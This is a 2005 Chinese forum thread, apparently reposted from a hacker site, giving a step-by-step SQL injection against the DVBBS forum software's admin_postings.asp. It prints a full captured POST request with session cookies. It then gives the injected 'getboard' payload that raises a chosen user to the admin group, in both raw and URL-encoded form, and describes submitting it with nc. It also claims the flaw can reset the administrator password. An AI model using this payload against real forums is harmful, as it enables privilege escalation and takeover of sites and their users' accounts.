收藏文章 楼主
动网BBS最新高危漏洞
网友【血蜘蛛】 2005-06-21 21:33:20 分享在【时代发展的印记】版块    9    1

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片
动网BBS系统的新漏洞,动网官方论坛到现在都还没出补丁。是刚发现的!那我们要首先找一个没有固顶帖子的版面,自己找找去。一个论坛总不可能哪个版块都有固顶吧?呵呵``点进去看看有没有固定帖子什么的,我是自己架设的平台做测试的。当然要“符合”漏洞条件了。以前台管理员的身份登陆,也不一定要用前台管理员进去,一个斑竹就行,能固顶帖子就行了,然后随便发个帖子。然后点下设置固顶如图1
meiguo.com 发布人签名/座右铭·有时你看似是一件很吃亏的事,往往会变成非常有得的事。
·凡事都留有余地,因为人是人,不是神,不免有错处,可以原谅人的地方,就原谅人。
·好的时候不要看得太好,坏的时候不要看的太坏。
大家都在看
回复/评论列表
默认   热门   正序   倒序
血蜘蛛
2F
血蜘蛛 Lv0
按正常的方式固顶,如图2
 0   2005-06-21 21:33:55  回复
血蜘蛛
3F
血蜘蛛 Lv0
到这里我们先暂停,打开WSE抓包工具准备抓取提交的post信息,打开了之后点下确认*作。现在看看WSE抓到些什么东西了,如图3
 0   2005-06-21 21:34:37  回复
血蜘蛛
4F
血蜘蛛 Lv0
截取到了post提交信息,复制下来,内容如下:

POST /sql/admin_postings.asp?action=istop HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Referer: http://192.168.1.254/sql/admin_postings.asp?action=istop

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; TencentTraveler ; .NET CLR 1.1.4322)

Host: 192.168.1.254

Content-Length: 133

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: 192%2E168%2E1%2E254%2Fsql%2F=UserID=1&usercookies=0&password=9pb621664s5w7IL7&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=1929167667; ASPSESSIONIDCATQTATT=JJGHMOMDLJJAAFHAGMLGOMIL; ASPSESSIONIDACTTRATS=NMLHLBBAPMOIEGAIBMBFOIMH; Dvbbs=; upNum=0

istopaction=1&boardID=1&ID=1&title=&content=a&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7

现在我们做什么呢?把getboard改成1,1);update [dv_user] set usergroupid=1 where userid=2;-- 不过我们得先转下unicode编码,用encoder.exe转一下,转换结果如下%31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%3B%2D%2D%20

把那个getboard=1把这个1换为注射语句就行了。这条语句的意思是将userid值为2的用户提到管理员组,不过只是前台管理员哦。然后算一下增加了多少个字符修改下Content-Length的值,我也懒得去数就改成250吧。修改完之后就用NC提交,如图4
 0   2005-06-21 21:35:16  回复
血蜘蛛
5F
血蜘蛛 Lv0
意思是将a.txt的内容用nc提交上去然后将返回的信息保存在1.htm里面.

接着打开我们输出的1.htm看看,如图5
 0   2005-06-21 21:35:38  回复
血蜘蛛
6F
血蜘蛛 Lv0
语法错误?知道是为什么吗?前面我说过了,Content-Length的长度我没数,语句只执行到1,1);update [dv_user] set usergroupid=1 where user这里,语句都没执行完,能正确吗?不过不要紧,我们把长度多加几个数就改成278吧然后再次提交,然后查看1.htm的输出结果,如图6
 0   2005-06-21 21:36:17  回复
血蜘蛛
7F
血蜘蛛 Lv0
看到没有?*作成功。成功执行了我们的注入语句。我们看看userid=2的用户是否成为管理员了,userid=2对应的用户名是:619054,为了省事,我就直接在后台查看下这个用户的权限是否为管理员了,如图7
 0   2005-06-21 21:36:56  回复
血蜘蛛
8F
血蜘蛛 Lv0
呵呵,真的提升为管理员了,这个漏洞不光可以将用户从普通权限提升为管理员,而且还可以直接更改后台管理员的密码,这够严重的吧?动网官方论坛到现在都还没出补丁。真够郁闷的!~``汗```Pizzaviat

文章来源于红客联盟:

http://forum.chinahonker.com/index.php?...e=end&tid=59904
 0   2005-06-21 21:37:59  回复
蝶舞门人
9F
太强,不能不顶----
 0   2005-09-15 10:13:41  回复
meiguo.com 创始人

emotion

1   2005-06-21 21:33:20  回复

回复/评论:动网BBS最新高危漏洞

暂无用户组 升级
退出
等级:0级
美果:
美过
精华推荐
  1. 遭遇无故吊销学签,藤校的中国留学生起诉且赢了🇺🇸国土安全部!
  2. 美国“大规模”取消国际留学生的签证
  3. 盘点美国最繁华的城市 top10
  4. 美国留学的政策大变?众多名校陷入财政危机,扩招中国学生?
  5. 百万民众“上街游行”抗议川普政府的百天?
  6. 成也“马老板”,败也“马部长”?关于伊隆·马斯克的现状
  7. DeepSeek已经让成人玩具“率先受益”
  8. 泽连斯基和川普、万斯在白宫当众吵架,饭都没吃着!
  9. 关于“跨国婚姻”婚姻绿卡,给配偶申请绿卡的各种细节问题!
  10. 这小伙年仅25岁,已经是百亿美金公司的创始CEO了!
  11. 这位美国年轻人在中国玩儿一圈,浪费掉美国政府的16亿美金?
  12. SpaceX在13小时内3连发,全力拯救被困宇航员!
  13. Google决定终止开源Android啦?
  14. 关税战持续了96小时… 突然大反攻?
  15. 北美留学生注意,美国和加拿大即将共享所有移民和签证讯息!
  16. 川普总统:在未来几周内开始发放“金卡签证”
  17. 台湾政府:一场误会呀
  18. 2025年,必须认识的一个英文单词 ~ tariff
  19. 全面盘点:加州大学的9大分校
  20. 李嘉诚在全球的港口“几乎清仓”,套现190亿美元!
  21. 华尔街“教父”空降北京,李嘉诚的“228亿美元交易”突遭截胡
  22. 川普关税政策可能导致意外后果
  23. 风向有变?🇨🇳中央召开民企座谈会,寓意深刻!
  24. 中美关税战的最佳写实作品~乌合麒麟发布《就不跪》
  25. 川普总统竟然帮马斯克“带娃儿加带货”,特斯拉市值保得住了?
  26. 王毅定调了中国统一,马英九发出了战争预警!
  27. 男性精液质量和预期寿命“真有关系”
  28. 美国房产的保值要点,但却被九成华人买家忽视了!
  29. 重庆妹子“盯美国男人不放”,前后嫁给美国医生和美国律师!
  30. 全球研究机构top10盘点:中国9家,美国1家
  31. 美国小伙儿在武当山修行十余年,终于获得“中国绿卡”了!
  32. 美国“H1B签证”新一轮抽签在3月份开启,新变化真不少!
  33. 滞留太空的NASA宇航员即将返回地球
  34. 中国“不陪川普玩”了… 从此不理会美方闹剧!
  35. 童工可以合法夜班了?
  36. 时至2025年3月中旬,地球上最顶尖的五大芯片品牌,均由华人掌舵!

美国动态 美果转盘 美果商店

Your IP: 3.12.160.196, 2025-04-22 05:57:21

Processed in 0.5969 second(s)

头像

用户名:

粉丝数:

签名:

资料 关注 好友 消息
已有0次打赏
(1) 分享
分享
取消